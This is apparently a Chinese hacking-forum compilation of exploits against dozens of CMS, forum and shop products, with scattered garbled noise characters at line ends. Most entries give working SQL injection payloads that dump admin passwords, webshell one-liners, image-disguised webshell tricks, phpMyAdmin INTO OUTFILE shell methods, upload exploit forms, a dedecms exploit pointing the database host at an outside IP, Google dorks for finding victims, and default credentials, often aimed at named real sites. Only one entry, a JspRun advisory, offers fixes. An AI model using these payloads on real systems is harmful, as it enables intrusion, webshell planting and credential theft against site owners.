启航企业建站系统 cookie注入漏洞通杀所有版本
) W Q$ \ P- b$ F+ A( F* Y4 i! V6 r0 {5 W) }
直接上exploit:( ]! Z! z" G, }3 C3 z6 L! W
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
( y$ a2 _! G# Y$ {. B( Ytest:http://www.tb11.net/system/xitong/shownews.asp?id=210
! d9 M2 s0 c7 P; A--------------------------------------------------------------------------------------------------------------------------------------------------------------------------$ o. Q" a+ M; i6 M8 e
Asprain论坛 注册用户 上传图片就可拿到webshell1 P' H! o5 e9 _+ k+ J* P
0 x7 Y1 X, F& i! N3 h# q6 C
Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。
2 p9 I# |0 s9 m# ]1 \4 j1.txt存放你的一句话马 如:<%execute(request("cmd"))%>) ~. Q. h9 D7 }2 L2 A$ w6 a0 d
2.gif 为一小图片文件,一定要小,比如qq表情图片( y7 u0 i( R Z7 g
3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用
5 t7 m5 w1 D9 s+ }- C! A4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了
4 l% m$ J3 ^5 Z7 m: I9 b* L9 y2 ]5.q.asp;.gif* q+ b9 u; e/ v/ _
google:Powered by Asprain i7 U( n; ] Z
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
/ ?7 Q% Q& A. x8 m1 b Z0 ^# i" u' K2 }* I: Q) j. N8 Y$ d( v
ShopNum1全部系统存在上传漏洞。
' |4 n* f6 d" ~0 f% q
9 e; t/ p3 g- L: h# b, I# I* S6 a首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。: _: I2 A% o1 {' E6 {
按说明 提示登录后台。。
5 W+ q ?/ g3 T, b) ^; U8 M8 J在后台功能页面->附件管理->附件列表' Q" z! y7 c8 V( g* e
可以直接上传.aspx 后缀木马
3 p4 O3 g( j; Q0 Zhttp://demo.shopnum1.com/upload/20110720083822500.aspx- d# r1 `% |$ j* R/ ~
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------( S. e& q" @- Z/ W" |# o3 z7 n; _
( G4 n# I6 H% t牛牛CMS中小企业网站管理系统 上传漏洞6 x! b9 U' ?# {* }# X4 x
) b) a% O; u3 y7 Z
牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。1 Y6 a+ U( q# I7 I
后台:admin/login.asp
# {0 b( v5 e, v9 A' K, T+ Cewebeditor 5.5 Nday
8 D6 {! g, Q5 o! o" rexp:( b! h0 _+ C5 V6 C" i
<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?
q2 y2 |0 S: @* @4 s<input?type=file?name=uploadfile?size=100><br><br>?# W8 E. b* Z9 {* v; @+ O
<input?type=submit?value=upload>?
" n- z& P' y* X7 H' s( s" V</form>
( A- Z' a# m2 L# zps:先上传小马.
! Z0 P: v# T- vinurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏
/ }+ J U% ]- U) F1 V( @4 E" T9 f* I6 z' g" w8 d7 r* X# [+ v; U* H x* v
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------( p* X1 d6 I, o% J/ C! Z. F
: c5 P* Y4 L' n0 g
YothCMS 遍历目录漏洞
% I e3 t1 l- l; `
. k# X6 ?) ~- Y! O7 ?* w优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。: j* h) D$ Y% e
默认后台:admin/login.asp# U) {8 K* ^3 G& m! ?
遍历目录:
4 n m& O% ~: ?- q* o/ ^+ j Y, Lewebeditor/manage/upload.asp?id=1&dir=../
; C" Y N; [# k hdata:: k* w' J6 q) q4 q3 q" R3 {
http://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa
- o7 S) o! M, {6 G' ]1 m--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
0 ^6 h( A* S" I- m; C6 h+ X7 d7 m- Z" D
Net112企业建站系统 1.0; z" I3 F3 \/ R- c
$ Y7 ]( C1 C. I
源码简介:
' G0 U* v' r7 I- z+ mNet112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。2 W! D0 A) m `$ u5 {
添加管理员:
8 Q9 P% D2 Y" hhttp://www.0855.tv/admin/admin.asp?action=add&level=27 y1 J: x. R" S3 ]) P' Y
其实加不加都不是很重要,后台文件都没怎么作验证。+ ^" H; x3 n4 O/ b
上传路径: g+ Y u$ Z8 a) I
http://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200
! B% ?$ U; p% \8 N% K! m6 Thttp://www.0855.tv/inc/Upfile.asp?Stype=20 C6 _( b, j3 s8 }6 I9 |( y
怎么利用自己研究。
- B0 `- H4 l% ]: Z2 r; |( ~1 X遍历目录:
' ]+ U9 [6 z% y8 R5 B* w7 shttp://www.0855.tv/admin/upfile.asp?path=../..
/ G! S( v+ L4 k4 a: T# r如:& J2 l* b! L0 h5 J5 i: y+ Q7 ~ U6 ^
http://www.0855.tv/admin/upfile.asp?path=../admin
) n; @/ k* U; V- |http://www.0855.tv/admin/upfile.asp?path=../data1 h: I, _5 K- A4 F! J
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
3 O2 C7 y: P# K) r7 n: N6 `! v! l( b" j8 D( s3 p) {
易和阳光购物商城通杀 上传漏洞
' a) {/ `3 j2 t! Y
; a: i8 E+ B3 ~0 E9 ], y# q前提要求是IIS6.0+asp坏境。- S6 D/ {2 u3 ^+ x! J. m K7 p6 N9 m
漏洞文件Iheeo_upfile.asp 1 i# X- P4 [8 ]4 ~
过滤不严.直接可以iis6.0上传! H7 Z2 S8 j) A
把ASP木马改成0855.asp;1.gif) O- s) O( S1 A
直接放到明小子上传
6 e/ Q. F- y2 c* V5 u) t7 a- oGoogle搜索:inurl:product.asp?Iheeoid=5 d( T( A5 b7 F' V+ t* v0 \
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------' L6 p1 B* f' A( a! p
9 T$ r3 Z9 j: v: p* B" Y4 ]& M
phpmyadmin后台4种拿shell方法
8 F9 ~8 E1 v1 N* d: m; f3 a o/ }# x5 f0 r- A2 N
方法一:
1 ~+ j, m, P( K7 N' ^' UCREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
3 f v- k1 b& j- l! IINSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');
3 X/ q \! L* z5 @5 L, p0 ^0 l iSELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';0 W4 Y7 a) X7 T4 V. ^$ [ A
----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php4 Y% z8 T8 c5 E: G; g
一句话连接密码:xiaoma
" }* L& e5 x% K1 H! Y方法二:
& j7 F6 d5 f; f7 m+ [Create TABLE xiaoma (xiaoma1 text NOT NULL);2 Q) x+ M% O: A4 x- U& I: x9 W
Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');
3 }& n7 G# h2 d- w4 r! Pselect xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
* c) M3 v% m, Q, p1 EDrop TABLE IF EXISTS xiaoma;' q) h5 N0 Y/ ~' ~) w+ E4 k$ y
方法三:
) \3 ^$ |3 t |读取文件内容: select load_file('E:/xamp/www/s.php');* r2 ^# y# q0 Q. e
写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'7 H4 p, [1 @( D2 r
cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
" D, _8 z( y' B8 r/ l& W方法四:
8 j7 ~+ S% x8 v% ]" |( Vselect load_file('E:/xamp/www/xiaoma.php');
8 F) t) i# p6 |) J/ I0 W( `select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
$ V4 ^( w$ P" F L* a* Q/ z! A然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir
7 J5 Q I0 |* u, c3 m) y--------------------------------------------------------------------------------------------------------------------------------------------------------------------------5 w/ j# W, P- @! [7 U! k( z
2 O- l- `7 Q2 c
传信网络独立开发网站源码0day漏洞
: ~' @6 |1 i8 t" h$ [/ M+ [8 D' T& b7 ` T, e
后台system/login.asp
, U/ Y: W1 ~) a5 `$ Z进了后台有个ewebeditor( `2 L8 m( J4 \5 c) {
Google 搜索inurl:product1.asp?tyc=
* A/ U6 U1 a- {- R2 m编辑器漏洞默认后台ubbcode/admin_login.asp/ L Y7 Z* Y+ H1 x4 h' R) H
数据库ubbcode/db/ewebeditor.mdb
/ W8 D' {4 U/ _; ]) _默认账号密码yzm 1111118 ]3 k* g5 w c( t. s) }
! h) i. S2 O/ r& O, z6 L4 ?
拿webshell方法
# Y. R; B/ }: g! v6 d5 a9 r8 c- L登陆后台点击“样式管理”-选择新增样式 8 R7 _" B2 q4 S; Y) Y
样式名称:scriptkiddies 随便写
+ w3 f8 N# m- x6 K0 h% _/ P* A路径模式:选择绝对路径 4 k7 @6 t+ J% q) |. N: P
图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx; H7 i( K3 x4 j0 G( y- ?2 M
图片类型比如就是我们要上传的ASP木马格式
! b& Q$ U! ^0 `6 G8 Y7 x上传路径:/2 Y$ M0 N8 C! ?7 ?1 w4 {
图片限制:写上1000 免的上不了我们的asp木马; X ~; W6 J. F, O8 j
上传内容不要写
8 z. L! B! t" P* [( K) _, C- B* g可以提交了 ) O4 i% e! s( A9 T, X5 I
样式增加成功!
% e3 O) n; J3 g返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
2 [& H* Y2 |) L6 o* ^按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
! U7 E" p$ q, ^6 G. ]网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies
2 ^/ W2 o) u" b# C上ASP木马 回车 等到路径
% E" z/ I8 f) s2 d+ _. J# H1 [9 s0 B7 x. W3 A+ N
后台:system/login.asp
( M: ~! Z p9 u% u, l4 Y# _2 IExp:: E$ N% m9 X/ e6 ]9 W; @- }/ G- P
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
2 a* q" S% |, Y; q9 S测试:4 P& z2 o. Z% L
http://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master$ f8 Y7 C5 d3 P3 n1 Y0 \8 F
http://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
% B& O$ y) @4 Q9 ?--------------------------------------------------------------------------------------------------------------------------------------------------------------------------: f3 F% q% l0 W% i) Q8 L# W( t. l
# Y2 z( R; B# |; E) p6 yfoosun 0day 最新注入漏洞
, y) D, l1 k! ^% C8 c( w
y$ X7 t& z# A. `. R6 L; d, z漏洞文件:www.xxx.com/user/SetNextOptions.asp
( T P, d3 r# l# i& B6 i. i利用简单的方法:; H$ n0 ?0 `+ e
暴管理员帐号:
2 T5 F" [6 E1 |http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin# k* u! O* T( I) x8 q
暴管理员密码:
; D' Z7 l1 g) v' S6 Zhttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,' k" p3 a8 }" ~: X6 O/ }3 J
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
8 g) @: r6 T& u+ V. x; l' F8 c# N$ D0 ~2 l: D/ M. J' l
网站程序的版权未知!% V U( r+ `% d# \" V' Z+ ~
0 A7 p2 i: v$ ?0 [) Y: x0 J默认网站数据库:8 `4 j- c1 K1 p" P6 Y
www.i0day.com/data/nxnews.mdb* i# r0 I5 `: L/ r$ b+ F
ewebeditor 在线编辑器:
1 t( C7 f% R# L$ [4 Q编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb
1 ]7 M: ?; y5 |$ W" z登录地址:ewebeditor/admin_login.asp
3 [ S1 X5 O0 R2 G' J% ]默认密码:admin admin# |( R1 L! u. D
登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data1 T' w, G. `! c
1 f, R3 A% n+ _6 V2 Z! J9 ?" @Sql注入漏洞:
3 B N* p. p( [; g& L4 n3 K6 Ehttp://www.i0day.com/detail.asp?id=12
3 C" @5 q8 s7 f6 @. I+ |exp:6 b1 M# C: a9 G
union select 1,admin,password,4,5,6,7,8 from admin
; B0 e9 J1 U. ~爆出明文帐号/密码
/ l; A& ^' W" p0 ~8 U5 j% L0 U
8 c- {! ? w; E上传漏洞:
U; A& W% R% r4 i; n后台+upfile.asp& O, O. Q( H# A% ^) i& ^
如:
; v- ^2 E2 o5 f4 U4 Chttp://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。
3 g* ]3 T4 D5 \shell的地址:网址+后台+成功上传的马) q$ N& e; V6 D. `4 t
google:inurl:news.asp?lanmuName=, T9 G( F" m( V2 I! ]
------------------------------------------------------------------------------------------------------------------------------------------------------------------------0 ?: j$ E7 X6 o$ l1 T2 F' J' I
& N" i* h. I4 ^" _/ l' Q& C
dedecms最新0day利用不进后台直接拿WEBSHELL
8 J$ M; d2 g/ ]: D i* h3 D0 f9 _+ m9 K, @ c) ]# z1 h
拿webshell的方法如下:3 [* s3 |7 K' `3 v: i; a
网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.
* P, |( {- I1 e) T1 G前题条件,必须准备好自己的dede数据库,然后插入数据:3 h* D3 T0 } ?
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}'); 3 |, w L4 K4 U; F0 _
2 ]! U4 N b& [再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。% W5 C% w7 e# ~8 j# r2 ^7 g" @
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">: E& @5 S2 o& y7 L" m Y
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />- [4 D% ~; Y, q; P
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />0 C6 M& V$ }4 f; Z* @8 k0 d
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
; A1 n2 o4 j9 s5 M# u<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />+ H4 @, `) H' _: v7 D
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />6 o0 C7 v' r7 c) r! L* z7 V
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
* w$ r. g* P) p2 }' M1 }- q<input type="text" value="true" name="nocache" style="width:400">1 E8 n: U% l* S3 p
<input type="submit" value="提交" name="QuickSearchBtn"><br />
5 }& J3 }* d- u+ ?</form>0 @* W5 g# b: i/ p3 f& i Q& ]
<script>
2 H! b, W/ C( _/ w& i! Zfunction addaction()
! b6 u; u* k% Q7 ~2 @/ R{ L: E) J8 _" O' Y
document.QuickSearch.action=document.QuickSearch.doaction.value;' T( S5 O& r G* x9 T. f& S" ~/ s
}
. s2 p# {( X3 I+ e I* N4 R9 H</script>' K0 s0 u; Y, C9 L' u( N
-----------------------------------------------------------------------------------------------------------------------------------------------
- ^9 j& ?! ?# u0 V8 C
9 f2 T ]" K, N" C. K/ p4 e, P& l8 ~dedecms织梦暴最新严重0day漏洞
1 g6 M7 a( V, wbug被利用步骤如下:- J3 f2 k+ [0 U" a( z3 b" _! Z9 A
http://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root3 B+ G5 R% V! p& {
把上面{}上的字母改为当前的验证码,即可直接进入网站后台。( @% N6 N0 p% C$ X
-------------------------------------------------------------------------------------------------------------------------------------------
8 L6 Y' V4 B/ Q4 u7 p- p0 b" ^5 U9 U# e
多多淘宝客程序上传漏洞
" [7 _7 X% M. g# F, A" z- T" K4 d* ]漏洞页面:/ {7 s, Q- c8 a" n; x
admin\upload_pic.php
5 V9 Y5 J$ a& W& S& R" r: G8 R: v传送门:
6 A8 A" f7 D) a% |6 F9 yhttp://www.www.com/admin/upload_pic.php?uploadtext=slide19 ]( t/ w4 K; z: p" R
PS:copy张图片马 直接 xxx.php 上传抓包地址!/ z! E$ B0 I5 C" _( ^5 r
------------------------------------------------------------------------------------------------------------------------------------------------------
+ Y$ [9 E1 F5 F# x+ s3 o( g$ j2 s
无忧公司系统ASP专业版后台上传漏洞
& c/ w( q. Y: T: C" |3 b漏洞文件 后台上传/ t1 \8 O: V: F6 {6 G0 H& `$ [: A
admin/uploadPic.asp6 L/ }7 C9 r% ]5 s+ Q
漏洞利用 这个漏洞好像是雷池的
% |- O l7 k7 ohttp://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=14 M2 E$ l% z% C6 m) @: o1 C2 [
等到的webshell路径:
0 Q. ?" V. D% N/UploadFiles/scriptkiddies.asp;_2.gif
* ~+ Z' O+ b" V6 E. G---------------------------------------------------------------------------------------------------------------------------------------------------
* d- {3 O3 T; S/ o! y+ S4 j$ }3 Y* m5 k. `0 C
住哪酒店分销联盟系统20106 x- A _* q1 J1 C3 ^' R
Search:! ]+ I7 ~$ ~# J+ o
inurl:index.php?m=hotelinfo9 L/ J) q4 j9 u
http://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin$ O8 M6 O1 x5 e9 ?" y m" Q- A9 A
默认后台:index.php?m=admin/login; t! B, B& X1 U
--------------------------------------------------------------------------------------------------------------------------------------------------
4 J! w/ B, N* y8 Q3 u: ?, M
. F! D& K8 x" d6 G, c! A8 ginurl:info_Print.asp?ArticleID=
9 g. e( F/ ?0 H; D6 f1 B3 P后台 ad_login.asp/ H& J, S K- P' ]2 I M) I
爆管理员密码:
" n& x) f$ p( d4 l6 Punion select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin/ Y' o3 F; G% g, W
------------------------------------------------------------------------------------------------------------------------------------------------------------
) A/ x* S. K2 E- u9 _0 G4 e2 R. ^: U6 n6 v
搜索框漏洞!
+ x/ T/ y! I+ {: p* _: K%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='. O- X5 }% E* s
--------------------------------------------------------------------------------------------------------------------------------------------------------* G' @- U' W: |( C
# `( j4 b) C5 k: U8 w. O/ |
关键字:
! G2 l+ Y b, a Q/ ^inurl:/reg_TemletSel.asp?step=2
1 O5 _* @* C# [. z+ ]" f( `& M或者
/ e/ Q: M. H/ Q电子商务自助建站--您理想的助手, _) V" S5 r. s: K' t. G
-------------------------------------------------------------------------------------------------------------------------------------------------5 Y6 r$ b! Z& m7 @4 W0 a$ A
! m3 E; f8 ~+ n% J% [
iGiveTest 2.1.0注入漏洞
; a `* ]1 u% d7 N6 i* y, I, @5 g' `Version: <= 2.1.02 \' ?6 | [- s8 F6 \
# Homepage: http://iGiveTest.com/
5 \& L ?: @. u/ S谷歌关键字: “Powered by iGiveTest”
$ Z$ H' r" v$ t+ G随便注册一个帐号。然后暴管理员帐号和密码5 g* f' z& `4 D) {- _0 ^5 P8 f2 Y5 p/ F
http://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
$ a1 K# }, ~8 E: L$ z------------------------------------------------------------------------------------------------------------------------------------------------
% b3 v" L4 e- q; ]7 n0 v/ j, Z& A4 C6 O
CKXP网上书店注入漏洞
6 i# |% Z" v% o8 P. K% b工具加表:shop_admin 加字段:admin+ H' ]' T; v- z
后台:admin/login.asp
, c q" V, o, \ N; B8 h1 y# g登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/6 k' ]6 o! ]* E9 y# T" a
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
& T' U9 A. j" B" J--------------------------------------------------------------------------------------------------------------------------------------------------------------------------2 o: }( ~: e3 w( P$ Z6 h3 j- Q
' S+ D* Z) o6 F) i1 q段富超个人网站系统留言本写马漏洞
* T/ c5 m9 `- i: X6 }源码下载:http://www.mycodes.net/24/2149.htm
" X% r/ C3 w! w( O6 Xaddgbook.asp 提交一句话。. \3 [4 c( a* _; A
连接: http://www.xxxx.tv/date/date3f.asp, N# m6 J7 Z3 s( G
google:为防批量,特略!2 R: m, p/ ]* \2 k
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- T: x; ^. B' ?- W) X' w% Z- C6 M7 _% d* i- l8 d* {
智有道专业旅游系统v1.0 注入及列目录漏洞: H( m9 [+ |4 ~( {5 ^( C) n. E
默认后台路径:/admin/login.asp
9 e5 W5 u" @, z/ h+ Q. t默认管理员:admin' \& S- z+ m( h8 }0 w" |! x3 R
默认密码:123456
% M/ F" U' r0 q& f% y7 _7 t, z+ U; _SQL EXP Tset:7 Y7 J, M4 u% l" D! S8 d K
http://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin
- x. ]5 i. |' S% b5 L------------------------------------------------------------------------------------------------------------------------------------------------------------------------
' t( e7 E( }4 q, I0 @+ O- ]7 W% o8 w, `; e% ]" v* q5 |9 k
ewebeditor(PHP) Ver 3.8 本任意文件上传0day
8 w$ x2 R( C; \& [8 hEXP:
% D( ]0 q$ e1 A<title>eWebeditoR3.8 for php任意文件上EXP</title>, o. s2 A% a+ l, t) I& u
<form action="" method=post enctype="multip
# Y" ~( H% |: T9 D$ ^! {6 f) X5 I+ l. {art/form-data"> . A; u+ H$ x4 J/ U; Q2 X& \
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000"> 2 o# @% ^0 A) R0 F" i$ K
URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
2 g( k) F1 Z! d. x- I<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
# L0 E* l0 m8 S9 @# ~8 M/ V3 mfile:<input type=file name="uploadfile"><br>
) \% r6 ?, [: z' V' S+ C<input type=button value=submit onclick=fsubmit()> : i( S! L8 r; r# s8 p$ w* a; U
</form><br>
8 B1 [ I" l/ U+ F1 T<script> 5 ?% X: q& B {! M+ H( I- f
function fsubmit(){ . i# e8 C. D: }3 E0 n
form = document.forms[0]; 8 \8 N- L# N! _& J3 q- \1 C) F% W
form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en'';
! u# c, Z& L" y3 C, d* \$ Dalert(form.action);
* s, g! A$ z& p. m0 S2 u0 pform.submit(); 2 L# G) A% A, _
} 4 Y, \; { l# ~& w
</script>. N" ]3 @1 t! K
注意修改里面ewebeditor的名称还有路径。
" J$ J3 H% m& Z/ I( \! `) U---------------------------------------------------------------------------------------------------------------------------------------------------------------------------8 ?8 z* V- e; j7 j, y
$ L) R* B% G, I- L. h A
提交’时提示ip被记录 防注入系统的利用
; |$ v2 Z* `& I* w0 e4 q网址:http://www.xxx.com/newslist.asp?id=122′
4 f# U6 ~" W, ~' F% N提示“你的操作已被记录!”等信息。$ S" D8 Z3 J1 w0 F
利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。( M N6 y( `1 T* g( ?
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------; _1 A' T8 G% B% c! m! G; w
* ^2 Y0 x+ V ?+ _西部商务网站管理系统 批量拿shell-0day
O! m! f7 n4 S+ ?2 L- d这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb
! M* u( u) l9 w9 }1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛; G* ^1 M3 B+ o. t
2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合3 y% x: ~" ~$ S! t' i& ~7 ~* I
3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂8 B7 Y' E2 g3 w: z8 W' A
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------# n5 R. c. o! r( G0 a( k6 ]$ C
; c8 J9 U7 h! x/ j$ ]JspRun!6.0 论坛管理后台注入漏洞+ {8 z! f# m0 E" }! H
4 o0 C0 p" V5 P }8 K2 N2 b
SEBUG-ID:20787 发布时间:2011-04-30 影响版本:3 f+ s) W8 H* e8 R" S' V
JspRun!6.0
7 \ t$ W2 X+ y6 l' u& O. r漏洞描述:
) X7 m. E8 M ZJspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。- |5 @' A6 e: h
在处理后台提交的文件中ForumManageAction.java第1940行9 \' s+ H) F3 Y5 Q$ z
String export = request.getParameter("export");//直接获取,没有安全过滤
5 ^) z2 n4 R8 t4 z3 t2 ]if(export!=null){
3 r" }4 i% w5 i: o+ \4 J; _List> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了... R' z; m$ G) d7 L& q1 l6 _
if(styles==null||styles.size()==0){
/ v" P" @& q8 y3 }/ h4 D* G<*参考& [2 z. r- Y) d" m' t& Y. F x, Z8 h" g, i
nuanfan@gmail.com
0 t% u& M' M" z1 o- ~. k*> SEBUG安全建议:
" S9 n" n. ?% q; gwww.jsprun.net2 R. p8 E7 D/ p
(1)安全过滤变量export, N# i2 N6 d* c/ H: g
(2)在查询语句中使用占位符. e" I# B3 v2 e8 U: Q; ]* X
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------% a! O# S& ]* p, E. y& z/ Y: _
8 {* R8 t+ Q9 Z/ Y8 z乌邦图企业网站系统 cookies 注入' a( x; t4 B" n- p) B) d
) u4 |, y! M+ |3 ~+ J# L D8 K+ [1 S
程序完整登陆后台:/admin/login.asp
" ?0 T+ B# B; n3 a默认登陆帐号:admin 密码:admin888# N4 q! c K6 H
语句:(前面加个空格)
4 e6 O# L/ u' tand 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
+ v7 M8 H1 v. L" T) s" D或者是16个字段:) x# x+ e7 {$ M5 [ u
and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin8 N% o" w4 _" l
爆不出来自己猜字段。
/ f4 J! `/ j, C' ~0 j/ e0 `注入点:http://www.untnt.com/shownews.asp?=88) b% O% ~7 A/ q! g+ e
getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp
4 C: n6 O5 ~6 Z关键字:" _% e% X' r; [* V: l8 _ t
inurl:shownews?asp.id=0 O; Z Y# C# B/ U8 [8 t
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
* t/ f: y1 S$ |* p0 V! u& j
9 J" a8 X4 [4 c, [/ {" P' ~CKXP网上书店注入漏洞
5 r+ k" H* a' _* V, C
! Q2 A' q0 h! a* ?工具加表:shop_admin 加字段:admin
# s; K9 O2 g$ q5 S ~后台:admin/login.asp ; E/ a0 {1 t3 q' R6 A
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/- A, ~7 i5 ?1 k0 ^4 D& J' G a
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息$ T0 E2 n9 f% |( s' P, Y: F
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------7 Q, o, \8 N1 U, N( _
% N [# W) J+ P' a. t" wYxShop易想购物商城4.7.1版本任意文件上传漏洞
! L7 |, `: }9 S) ]' A
: R+ v% f2 {/ {http://xxoo.com/controls/fckedit ... aspx/connector.aspx
- z1 F& o) H# T1 k+ A跳转到网站根目录上传任意文件。/ V( \; o5 d6 F. {
如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件
